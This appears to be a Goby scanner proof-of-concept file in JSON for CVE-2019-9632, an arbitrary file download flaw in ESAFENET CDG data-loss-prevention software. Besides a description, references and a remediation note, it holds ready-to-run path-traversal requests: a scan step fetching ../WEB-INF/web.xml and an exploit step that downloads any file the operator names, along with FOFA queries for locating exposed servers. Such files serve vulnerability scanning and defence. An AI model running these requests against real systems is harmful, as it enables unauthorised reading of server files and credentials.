mirror of https://github.com/qwqdanchun/Goby.git
{
"Name": "ESAFENET CDG arbitrary file download (CVE-2019-9632)",
"Description": "ESAFENET CDG V3 and V5 have an arbitrary file download vulnerability via the fileName parameter in download.jsp because the InstallationPack parameter is mishandled in a /CDGServer3/ClientAjax request.",
"Product": "亿赛通DLP",
"Homepage": "http://www.esafenet.com/",
"DisclosureDate": "2019-03-04",
"Author": "gobysec@gmail.com",
"FofaQuery": "app=\"亿赛通DLP\" || app=\"ESAFENET-DLP\" || app=\"亿赛通-DLP\"",
"GobyQuery": "app=\"亿赛通DLP\" || app=\"ESAFENET-DLP\" || app=\"亿赛通-DLP\"",
"Level": "1",
"Impact": "\u003cp\u003e代码实现了将文件下载到客户端,但是没有对传入的参数进行过滤,造成可以下载服务器任何文件,产生任意文件下载漏洞。比如下载系统配置,数据库配置文件,可以导致黑客顺利进入数据库或者系统的敏感信息。导致网站或者服务器沦陷。\u003c/p\u003e",
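"Recommendation": "\u003cp\u003eApply the vendor's security update for ESAFENET CDG where one is available. Until then, restrict access to /CDGServer3/ClientAjax to trusted networks, and reject InstallationPack values that contain path traversal sequences such as ../ at a reverse proxy or WAF. Review web server logs for POST requests to /CDGServer3/ClientAjax with command=downclientpak whose InstallationPack value contains ../. If WEB-INF/web.xml or other configuration files may have been retrieved, rotate any credentials they contain.\u003c/p\u003e",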
"References": [
"http://www.iwantacve.cn/index.php/archives/132/",
"https://nvd.nist.gov/vuln/detail/CVE-2019-9632",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9632"
],
"HasExp": true,
"ExpParams": [
{
"name": "file",
"type": "select",
"value": "../WEB-INF/web.xml",
"show": ""
}
],
"ExpTips": {
"Type": "Tips",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"data": "command=downclientpak&InstallationPack=../WEB-INF/web.xml&forward=index.jsp",
"data_type": "text",
"follow_redirect": false,
"header": {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
},
"method": "POST",
"uri": "/CDGServer3/ClientAjax"
},
"ResponseTest": {
"checks": [
{
"bz": "",
"operation": "==",
"type": "item",
"value": "200",
"variable": "$code"
},
{
"bz": "",
"operation": "contains",
"type": "item",
"value": "<servlet-name>CDGPermissions</servlet-name>",
"variable": "$body"
}
],
"operation": "AND",
"type": "group"
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"data": "command=downclientpak&InstallationPack={{{file}}}&forward=index.jsp",
"data_type": "text",
"follow_redirect": false,
"header": {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
},
"method": "POST",
"uri": "/CDGServer3/ClientAjax"
},
"SetVariable": ["output|lastbody"]
}
],
"Tags": null,
"CVEIDs": [
"CVE-2019-9632"
],
"CVSSScore": "7.5",
"AttackSurfaces": {
"Application": ["ESAFENET-CDG"],
"Support": null,
"Service": null,
"System": null,
"Hardware": null
},
"Disable": false
}